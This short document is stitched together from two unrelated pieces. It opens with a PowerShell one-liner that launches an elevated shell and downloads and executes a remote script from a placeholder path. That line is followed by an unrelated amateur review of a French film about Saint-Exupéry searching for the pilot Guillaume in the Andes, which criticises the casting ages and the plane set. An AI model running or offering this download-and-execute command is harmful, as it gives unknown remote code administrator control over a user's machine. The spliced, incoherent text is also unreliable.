powershell -Command "Start-Process powershell -ArgumentList '-Command Invoke-Expression (New-Object Net.WebClient).DownloadString(''{PATH}'')' -Verb RunAs"
When the best airmail pilot Henri Guillaume disappears in the Andes, his best friend Antoine de Saint-Exupéry decides to go in search of him against all odds. The little prince was in every house, so the author’s story was eagerly awaited. A story about the period when his childhood friend Guillaume and they worked in the postal service between Argentina and Chile. So far everything is fine. They are childhood friends of the same age. Now here’s the problem, when they got older, the age difference was almost 20 years. So, here is my criticism. Why are they taking Kassal at the age of 57 to play a 29-year-old? Saint-Exup should be 30, played by a 41-year-old is still normal. Diana Kruger was cast to match Cassal’s age. Are there no young actors in the French film industry? So, the choice of actors, although good actors, was bad. The images were great, but the walls in the plane are not realistic!